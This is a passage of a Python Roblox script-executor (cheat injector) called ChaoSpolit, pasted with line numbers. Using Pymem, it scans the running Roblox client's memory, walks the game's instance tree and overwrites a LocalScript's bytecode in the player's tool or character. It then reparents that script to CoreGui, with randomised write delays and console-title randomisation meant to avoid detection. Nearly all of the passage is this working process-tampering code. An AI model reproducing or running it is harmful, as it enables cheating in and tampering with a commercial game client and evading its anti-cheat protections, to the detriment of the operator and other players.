    ChaoSpolit.Pymem.write_longlong(newChildren + 0x8, e)
    ChaoSpolit.Pymem.write_longlong(newChildren + 0x10, e)
  624.  
  625.  
  626. def inject():
  627. nameOffset = 72
  628. parentOffset = 96
  629. childrenOffset = 80
  630.  
  631. def GetDataModel() -> int:# lua and cipher
  632. guiroot_pattern = b"\\x47\\x75\\x69\\x52\\x6F\\x6F\\x74\\x00\\x47\\x75\\x69\\x49\\x74\\x65\\x6D"
  633. guiroot_address = ChaoSpolit.AOBSCANALL(guiroot_pattern, xreturn_multiple=False)
  634. if guiroot_address != 0:
  635. RawDataModel = ChaoSpolit.DRP(guiroot_address + 0x38)
  636. DataModel = RawDataModel + 0x150
  637. return DataModel - 0x8
  638. else:
  639. print("Critical Error please restart the program")
  640. exit()
  641. from concurrent.futures import ThreadPoolExecutor
  642.  
  643. def check_ptr(i):
  644. ptr = ChaoSpolit.Pymem.read_longlong(dataModel + i)
  645. if ptr:
  646. try:
  647. childrenStart = ChaoSpolit.Pymem.read_longlong(ptr)
  648. childrenEnd = ChaoSpolit.Pymem.read_longlong(ptr + 8)
  649. if childrenStart and childrenEnd:
  650. diff = childrenEnd - childrenStart
  651. if diff > 1 and diff < 0x1000:
  652. return i
  653. except:
  654. pass
  655. return None
  656.  
  657. dataModel = GetDataModel()
  658.  
  659. with ThreadPoolExecutor() as executor:
  660. for result in executor.map(check_ptr, range(0x10, 0x200 + 8, 8)):
  661. if result is not None:
  662. childrenOffset = result
  663. break
  664. print(Colorate.Horizontal(Colors.cyan_to_blue, "Datamodel Scanning Completed Successfully", 1))
  665.  
  666. def GetNameAddress(Instance: int) -> int:
  667. try:
  668.  
  669. ExpectedAddress = ChaoSpolit.DRP(Instance + nameOffset, True)
  670.  
  671.  
  672. return ExpectedAddress
  673. except TypeError as e:
  674. print(f"TypeError: {e} \n" + "Line: Rsp8")
  675. exit()
  676.  
  677.  
  678.  
  679. def GetName(Instance: int) -> str:
  680. ExpectedAddress = GetNameAddress(Instance)
  681. return ReadRobloxString(ExpectedAddress)
  682.  
  683. def GetChildren(Instance: int) -> str:
  684. ChildrenInstance = []
  685. InstanceAddress = Instance
  686. if not InstanceAddress:
  687. return False
  688. ChildrenStart = ChaoSpolit.DRP(InstanceAddress + childrenOffset, True)
  689. if ChildrenStart == 0:
  690. return []
  691. ChildrenEnd = ChaoSpolit.DRP(ChildrenStart + 8, True)
  692. OffsetAddressPerChild = 0x10
  693. CurrentChildAddress = ChaoSpolit.DRP(ChildrenStart, True)
  694. read_longlong = ChaoSpolit.Pymem.read_longlong # Store in a local variable
  695. try:
  696. while CurrentChildAddress != ChildrenEnd:
  697. ChildrenInstance.append(read_longlong(CurrentChildAddress))
  698. CurrentChildAddress += OffsetAddressPerChild
  699. return ChildrenInstance
  700. except ValueError as e:
  701. print(f"\033[91mError: {e}\033[0m")
  702. exit()
  703.  
  704. def GetParent(Instance: int) -> int:
  705. return ChaoSpolit.DRP(Instance + parentOffset, True)
  706.  
  707. def FindFirstChild(Instance: int, ChildName: str) -> int:
  708. ChildrenOfInstance = GetChildren(Instance)
  709. for i in ChildrenOfInstance:
  710. if GetName(i) == ChildName:
  711. return i
  712.  
  713. def FindFirstChildOfClass(Instance: int, ClassName: str) -> int:
  714. ChildrenOfInstance = GetChildren(Instance)
  715. for i in ChildrenOfInstance:
  716. if GetClassName(i) == ClassName:
  717. return i
  718.  
  719. def GetDescendants(Instance: int) -> list:
  720.  
  721. descendants = []
  722.  
  723. def _get_descendants_recursive(current_instance: int):
  724. children = GetChildren(current_instance)
  725. descendants.extend(children) # Add direct children
  726.  
  727. # Recurse into each child
  728. for child in children:
  729. _get_descendants_recursive(child)
  730.  
  731. _get_descendants_recursive(Instance)
  732. return descendants
  733.  
  734.  
  735.  
  736.  
  737. class toInstance:
  738. def __init__(self, address: int = 0):
  739. self.Address = address
  740. self.Self = address
  741. self.Name = GetName(address)
  742. self.ClassName = GetClassName(address)
  743. self.Parent = GetParent(address)
  744.  
  745. def getChildren(self):
  746. return GetChildren(self.Address)
  747.  
  748. def findFirstChild(self, ChildName):
  749. return FindFirstChild(self.Address, ChildName)
  750.  
  751. def findFirstClass(self, ChildClass):
  752. return FindFirstChildOfClass(self.Address, ChildClass)
  753.  
  754. def setParent(self, Parent):
  755. setParent(self.Address, Parent)
  756.  
  757. def GetChildren(self):
  758. return GetChildren(self.Address)
  759.  
  760. def GetDescendants(self):
  761. return GetDescendants(self.Address)
  762.  
  763. def FindFirstChild(self, ChildName):
  764. return FindFirstChild(self.Address, ChildName)
  765.  
  766. def FindFirstClass(self, ChildClass):
  767. return FindFirstChildOfClass(self.Address, ChildClass)
  768.  
  769. def SetParent(self, Parent):
  770. setParent(self.Address, Parent, parentOffset, childrenOffset)
  771.  
  772.  
  773.  
  774.  
  775. print("Injecting...")
  776.  
  777. results = ChaoSpolit.AOBSCANALL("496E6A656374????????????????????06", True)
  778. if results == []:
  779. print("\033[35mPlease find another teleporter! Line: Rsp11\033[0m")
  780. return None
  781. for rn in results:
  782. result = rn
  783. bres = ChaoSpolit.d2h(result)
  784. aobs = "".join(bres[i - 1: i] for i in range(1, 17))
  785. aobs = ChaoSpolit.hex2le(aobs)
  786. first = False
  787. res = ChaoSpolit.AOBSCANALL(aobs, True)
  788. if res:
  789. valid = False
  790. for i in res:
  791. result = i
  792. offset_result = result - nameOffset
  793. try:
  794. if ChaoSpolit.Pymem.read_longlong(offset_result + 8) == offset_result:
  795. injectScript = offset_result
  796. break
  797. except:
  798. pass
  799. if valid:
  800. break
  801.  
  802. game = toInstance(dataModel)
  803. players = toInstance(game.FindFirstClass("Players"))
  804. localPlayer = toInstance(players.GetChildren()[0])
  805.  
  806.  
  807.  
  808. localBackpack = toInstance(localPlayer.FindFirstClass("Backpack"))
  809. tools = localBackpack.GetChildren()
  810. if len(tools) > 0:
  811. import hashlib
  812. tool = toInstance(tools[0])
  813. targetScript = toInstance(tool.findFirstClass("LocalScript"))
  814. injectScript = toInstance(injectScript)
  815. chunk_size = 40
  816.  
  817.  
  818. original_data = b""
  819.  
  820. for i in range(0, 0x150, chunk_size):
  821. chunk = ChaoSpolit.Pymem.read_bytes(injectScript.Self + 0x100 + i, chunk_size)
  822. original_data += chunk
  823. time.sleep(random.uniform(0.05, 0.1))
  824. original_hash = hashlib.md5(ChaoSpolit.Pymem.read_bytes(injectScript.Self + 0x100, 0x150)).hexdigest()
  825. if original_hash != hashlib.md5(original_data).hexdigest():
  826. for i in range(0, 0x150, chunk_size):
  827. chunk = original_data[i:i + chunk_size]
  828. ChaoSpolit.Pymem.write_bytes(targetScript.Self + 0x100 + i, chunk, len(chunk))
  829. time.sleep(random.uniform(0.05, 0.1))
  830. coreGui = toInstance(game.GetChildren()[31])
  831. targetScript.SetParent(coreGui.Self)
  832. print("Successfully attached to this Tool:", tool.Name)
  833. return True
  834. else:
  835. pass
  836.  
  837. workspace = toInstance(game.GetChildren()[0])
  838. character_found = False
  839.  
  840. character_found = False
  841. for obj in workspace.GetDescendants():
  842. obj_name = GetName(obj)
  843. if obj_name == localPlayer.Name:
  844. character = toInstance(obj)
  845. print("Found Character")
  846. character_found = True
  847. break
  848.  
  849. if not character_found:
  850. print("No Character")
  851. return None
  852.  
  853. injectScript = toInstance(injectScript)
  854. import hashlib
  855. animateScript = character.findFirstClass("LocalScript")
  856. targetScript = toInstance(animateScript)
  857. chunk_size = 20
  858.  
  859.  
  860. original_data = b""
  861.  
  862. for i in range(0, 0x150, chunk_size):
  863. chunk = ChaoSpolit.Pymem.read_bytes(injectScript.Self + 0x100 + i, chunk_size)
  864. original_data += chunk
  865.  
  866. original_hash = hashlib.md5(ChaoSpolit.Pymem.read_bytes(injectScript.Self + 0x100, 0x150)).hexdigest()
  867. if original_hash != hashlib.md5(original_data).hexdigest():
  868. for i in range(0, 0x150, chunk_size):
  869. chunk = original_data[i:i + chunk_size]
  870. ChaoSpolit.Pymem.write_bytes(targetScript.Self + 0x100 + i, chunk, len(chunk))
  871.  
  872. coreGui = toInstance(game.GetChildren()[31])
  873. targetScript.SetParent(coreGui.Self)
  874. return True
  875.  
  876.  
  877.  
if __name__ == "__main__":
    # `global` at module scope has no effect; `name` is a module-level
    # variable either way.
    global name
    # Background thread that keeps randomising the console title.
    name = threading.Thread(target=undetectname)
    name.start()

    input("Press Enter to inject!")
    if inject():
        Roblox = ChaoSpolit.YieldForProgram(f"{selector}")
        print("Reset your character to load the executor")
        stop_thread = True # Stop the thread
        name.join() # Wait for the thread to finish
        # os._exit ends the process immediately, including the process
        # watcher thread, and reports status 1 even though this is the
        # success path.
        os._exit(1)
    else:
        # stop_thread is not set on this path, so the title thread (and
        # the process watcher thread) keep the process running.
        Roblox = ChaoSpolit.YieldForProgram(f"{selector}")
        print("\033[35mError during injection! Line: Rsp12\033[0m")